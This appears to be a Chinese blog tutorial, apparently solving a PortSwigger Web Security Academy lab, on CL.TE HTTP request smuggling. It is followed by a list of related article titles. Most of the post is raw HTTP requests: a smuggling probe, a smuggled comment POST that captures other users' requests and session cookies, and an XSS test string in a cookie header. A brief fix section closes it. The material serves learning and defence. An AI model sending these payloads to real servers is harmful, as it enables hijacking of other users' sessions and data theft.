CL.TE 简介

前端通过Content-Length处理请求,通过反向代理或者负载均衡将请求转发到后端,后端Transfer-Encoding优先级较高,以TE处理请求造成安全问题。

检测

发送如下数据包

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 6

Transfer-Encoding: chunked

0

P

CT长度为8,前端将body全发给后端,后端看到TE后读取到0\r\n\r\n后标志结束,P被留在缓冲区,等待下一次被请求。当再次请求下面的数据包

GET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

P拼接到了下次请求变成

PGET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

利用

1、由于在第二个包中可以加入HOST,我们可以通过添加HOST达到访问内部资源的目的。

2、劫持其他用户请求。找到一个类似评论,留言板的功能。

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 1031

Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

Content-Length: 613

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxx



注意CL一定要设置成正好将下一个数据包拼接过来的长度。等待其他用户访问网站时,比如下一个用户的数据包是下面这样。

GET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

拼接后

POST / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=

Content-Length: 1031

Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

Content-Length: 613

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Sec-Fetch-Site: same-origin

Sec-Fetch-Mode: navigate

Sec-Fetch-User: ?1

Sec-Fetch-Dest: document

Referer: https://ac391f7e1e9af821806e890300db00d6.web-security-academy.net/post?postId=3

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=1ikPLa6JOFOQBjoPp80gPhMC6uFFyiIa

csrf=m7WAHCgqovsgoj1rpIpRQXcANljAHsR8&postId=3&name=asf&email=asf%40qq.com&website=http%3A%2F%2Fbaidu.com%2Fa&comment=xxxxGET / HTTP/1.1

Host: ac391f7e1e9af821806e890300db00d6.web-security-academy.net

Connection: close

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: session=<img src=1 onerror=alert(1)>

这样查看评论即可看到其他人的请求。

修复

  • 前后端处理请求采用同一种方式
  • 使用HTTP/2协议。

HTTP request smuggling CL.TE的更多相关文章

  1. Portswigger web security academy:HTTP request smuggling

    HTTP request smuggling 目录 HTTP request smuggling HTTP request smuggling, basic CL.TE vulnerability H ...

  2. 为什么一个Http Header中的空格会被骇客利用 - HTTP request smuggling

    figure:last-child { margin-bottom: 0.5rem; } #write ol, #write ul { position: relative; } img { max- ...

  3. Http Request Smuggling - Note

    http请求走私漏洞 访问Burp靶场速度感人..都要哭了(如果没有账户的先创建账户) 基础补充 pipeline http1.1有了Pipeline,就不需要等待Server端的响应了.浏览器默认不 ...

  4. 利用Haproxy搭建 HTTP 请求走私(Request smuggling)环境

    Haproxy 介绍 HAProxy是一个使用C语言编写的自由及开放源代码软件,其提供高可用性.负载均衡,以及基于TCP和HTTP的应用程序代理. 请求走私(Request smuggling)概念证 ...

  5. HTTP Request Smuggling 请求走私

    参考文章 浅析HTTP走私攻击 SeeBug-协议层的攻击--HTTP请求走私 HTTP 走私漏洞分析 简单介绍 攻击者通过构造特殊结构的请求,干扰网站服务器对请求的处理,从而实现攻击目标 前提知识 ...

  6. HTTP 请求夹带(smuggling)攻击

    什么是HTTP请求夹带(smuggling)攻击 HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术. 请求夹带漏洞危害,允许攻击者绕过安全控制,获取对敏感数据的未授 ...

  7. golang net之http server

    golang 版本:1.12.9 简单的HTTP服务器代码: package main import ( "net/http" ) type TestHandler struct ...

  8. 协议层安全相关《http请求走私与CTF利用》

    0x00 前言 最近刷题的时候多次遇到HTTP请求走私相关的题目,但之前都没怎么接触到相关的知识点,只是在GKCTF2021--hackme中使用到了 CVE-2019-20372(Nginx< ...

  9. [RoarCTF 2019]Easy Calc-协议层攻击之HTTP请求走私

    0X01:什么是HTTP请求走私 HTTP请求走私属于协议层攻击,是服务器漏洞的一种. HTTP请求走私是一种干扰网站处理从一个或多个用户接收的HTTP请求序列的方式的技术.使攻击者可以绕过安全控制, ...

随机推荐

  1. VulnHub CengBox2靶机渗透

    ​本文首发于微信公众号:VulnHub CengBox2靶机渗透,未经授权,禁止转载. 难度评级:☆☆☆☆官网地址:https://download.vulnhub.com/cengbox/CengB ...

  2. HTTP之User-Agent大全

    User-Agent 首部包含了一个特征字符串,用来让网络协议的对端来识别发起请求的用户代理软件的应用类型.操作系统.软件开发商以及版本号. 以下是一些常见的各种浏览器的User-Agent: 1) ...

  3. 入门大数据---Spark_Streaming整合Kafka

    一.版本说明 Spark 针对 Kafka 的不同版本,提供了两套整合方案:spark-streaming-kafka-0-8 和 spark-streaming-kafka-0-10,其主要区别如下 ...

  4. JDK8--08:Optional

    在程序运行时,空指针异常应该是最常见的异常之一,因此JDK8提供了Optional来避免空指针异常. 首先说明JDK8新增的Optional及相关方法的使用 Optional的常用操作: Option ...

  5. 学习Java的Day03

    接口的特点!!!! 接口不能创建对象 接口的变量使用public static final修饰,如果不写默认添加: 接口的方法为public abstrict,如果不写默认添加: 子类必须重写接口中所 ...

  6. windows下 react-native环境搭建

    跟着慕课网做案例,搭建rn环境遇到很大问题. 下面说一下: 首先看一下文档:http://reactnative.cn/docs/0.44/getting-started.html#content 注 ...

  7. 【反转开灯问题】Face The Right Way

    题目 Farmer John has arranged his N (1 ≤ N ≤ 5,000) cows in a row and many of them are facing forward, ...

  8. 搞懂ELK并不是一件特别难的事(ELK)

    本篇文章主要介绍elk的一些框架组成,原理和实践,采用的ELK本版为7.7.0版本 一.ELK介绍 1.1.ELK简介 ELK是Elasticsearch.Logstash.Kibana三大开源框架首 ...

  9. Javascript 中 数组遍历 forin和forof 的区别

    定义一个数组 let array = [1, 2, 3, 4]; for (let a in array){ console.log("遍历a的值 "+a+"”,数组中的 ...

  10. (私人收藏)64个精致的页面loadinggif动画

    64个精致的页面loadinggif动画 https://pan.baidu.com/s/18bfktLZ90jQ7l2kSmMv-dgnmm5